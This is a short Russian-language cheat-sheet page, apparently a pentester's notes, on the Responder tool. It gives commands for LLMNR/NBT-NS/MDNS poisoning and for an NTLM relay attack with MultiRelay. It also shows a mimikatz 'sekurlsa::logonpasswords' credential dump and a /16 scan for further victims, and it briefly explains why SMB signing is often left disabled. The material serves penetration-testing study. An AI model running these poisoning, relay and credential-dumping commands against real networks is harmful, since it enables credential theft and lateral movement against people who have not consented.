Responder

Intro

Responder β€” это Ρ‚Ρ€Π°Π²ΠΈΡ‚Π΅Π»ΡŒ LLMNR, NBT-NS (Netbios Name Service) ΠΈ MDNS со встроСнным ΠΌΠΎΡˆΠ΅Π½Π½ΠΈΡ‡Π΅ΡΠΊΠΈΠΌ сСрвСром HTTP/SMB/MSSQL/FTP/LDAP Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΠΈ, ΠΏΠΎΠ΄Π΄Π΅Ρ€ΠΆΠΈΠ²Π°ΡŽΡ‰ΠΈΠΌ NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP ΠΈ Basic HTTP Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΡŽ.

Π­Ρ‚ΠΎ инструмСнт для поднятия сСрвСров своих ΠΈ провСдСния Π°Ρ‚Π°ΠΊ.

Установка

$ apt-get install responder

ΠΈΠ»ΠΈ git: https://github.com/lgandx/Responder

Из git всС Π½ΠΎΡ€ΠΌ запускаСтся Π±Π΅Π· зависимостСй (Π²Ρ€ΠΎΠ΄Π΅).

ИспользованиС

ΠŸΠ΅Ρ€Π΅Π΄ запуском ΠΏΡ€Π°Π²ΠΈΠΌ Responder.conf

Π§Π΅Ρ€Π΅Π· Π±ΠΈΠ½Π°Ρ€ΡŒ

Π’ΠΊΠ»ΡŽΡ‡ΠΈΡ‚ΡŒ Π² Ρ€Π΅ΠΆΠΈΠΌΠ΅ ΠΏΡ€ΠΎΡΠ»ΡƒΡˆΠΈΠ²Π°Π½ΠΈΡ: responder -I eth0 -A Π’ΠΊΠ»ΡŽΡ‡ΠΈΡ‚ΡŒ Π² Ρ€Π΅ΠΆΠΈΠΌΠ΅ poising (Ρ‚Ρ€Π°Π²ΠΈΠΌ ΠΏΠ°ΠΊΠ΅Ρ‚Ρ‹): responder -I eth0 -wrFb

Π§Π΅Ρ€Π΅Π· python

sudo python Responder.py -I eth0 -A
sudo python Responder.py -I eth0 -w -r -F -b

Pass-the-Hash

ПослС Ρ‚ΠΎΠ³ΠΎ ΠΊΠ°ΠΊ словили Ρ…Π΅Ρˆ, ΠΌΠΎΠΆΠ΅ΠΌ Π»ΠΈΠ±ΠΎ Π±Ρ€ΡƒΡ‚Π°Π½ΡƒΡ‚ΡŒ, Π»ΠΈΠ±ΠΎ relay-Π°Ρ‚Π°ΠΊΡƒ Π½Π° сторонний сСрвис провСсти, Π°Π²Ρ‚ΠΎΡ€ΠΈΠ·ΡƒΡΡΡŒ ΠΏΠΎ ΠΏΠ΅Ρ€Π΅Ρ…Π²Π°Ρ‡Π΅Π½Π½ΠΎΠΌΡƒ Ρ…Π΅ΡˆΡƒ (SMB signing Π΄Π± ΠΎΡ‚ΠΊΠ»ΡŽΡ‡Π΅Π½): Π’ Responder.conf пСрСставляСм SMB ΠΈ HTTP Π² OFF ЗапускаСм $ responder -I eth0 ЗапускаСм `$ python MultiRelay.py -t <IP target> -u ALL` Π–Π΄Π΅ΠΌ, ΠΏΠΎΠΊΠ° ΠΆΠ΅Ρ€Ρ‚Π²Π° запросит доступ ΠΊ Ρ‚Ρ€Π΅Ρ‚ΡŒΠ΅ΠΌΡƒ рСсурсу -> вмСсто Π½Π΅Π΅ авторизуСмся ΠΌΡ‹.

Ѐишка MultiRelay, Ρ‡Ρ‚ΠΎ ΠΎΠ½Π° даст Π½Π΅ просто сСссию, Π° сСссию с Π΄ΠΎΠΏ модулями. НапримСр: mimikatz: #mimi sekurlsa::logonpasswords Поиск Π΄Ρ€ΡƒΠ³ΠΈΡ… ΠΆΠ΅Ρ€Ρ‚Π²: #scan /16

ЗамСчания: - Для MultiRelay ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ-ΠΆΠ΅Ρ€Ρ‚Π²Π°, Ρ‡ΡŒΠΈ ΠΊΡ€Π΅Π΄Ρ‹ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅ΠΌ, Π΄ΠΎΠ»ΠΆΠ΅Π½ Π±Ρ‹Ρ‚ΡŒ Π»ΠΎΠΊΠ°Π»ΡŒΠ½Ρ‹ΠΌ администратором Π½Π° Ρ‚ΠΎΠΌ ΠΊΠΎΠΌΠΏΠ΅, Ρ‡Ρ‚ΠΎ ΠΌΡ‹ Π°Ρ‚Π°ΠΊΡƒΠ΅ΠΌ - Если Π²ΠΊΠ»ΡŽΡ‡Π΅Π½ SMB signing - Ρ‚ΠΎ Π·Π°Π±ΠΈΠ²Π°Π΅ΠΌ ΠΈ ΠΏΠ΅Ρ€Π΅Ρ…ΠΎΠ΄ΠΈΠΌ ΠΊ Π΄Ρ€ΡƒΠ³ΠΎΠΌΡƒ хосту. NTLM-relay Π½Π΅ Π²Ρ‹ΠΉΠ΄Π΅Ρ‚. ΠΡŽΠ°Π½ΡΡ‹: ΠΏΠΎΡ‡Π΅ΠΌΡƒ Π½Π΅ Π²ΠΊΠ»ΡŽΡ‡Π°ΡŽΡ‚ SMB signing: 1. НСкоторыС ΠΏΡ€ΠΈΠ½Ρ‚Π΅Ρ€Ρ‹ Π½Π΅ ΠΏΠΎΠ΄Π΄Π΅Ρ€ΠΆΠΈΠ²Π°ΡŽΡ‚ SMB-signing, Ρ‡Ρ‚ΠΎ ΠΏΡ€ΠΈΠ²ΠΎΠ΄ΠΈΡ‚ ΠΊ нСвозмоТности ΠΏΠ΅Ρ‡Π°Ρ‚ΠΈ. 2. Π—Π½Π°Ρ‡ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎΠ΅ сниТСниС ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ΄ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎΡΡ‚ΠΈ SMB ΠΏΡ€ΠΈ ΠΏΠ΅Ρ€Π΅Π΄Π°Ρ‡Π΅ Π±ΠΎΠ»ΡŒΡˆΠΈΡ… Ρ„Π°ΠΉΠ»ΠΎΠ² ΠΈΠ»ΠΈ мноТСствСнному ΠΎΠ±Ρ€Π°Ρ‰Π΅Π½ΠΈΡŽ ΠΊ ΠΎΠ΄Π½ΠΎΠΌΡƒ ΠΈ Ρ‚ΠΎΠΌΡƒ ΠΆΠ΅ сСрвСру нСсколькими ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡΠΌΠΈ

Last updated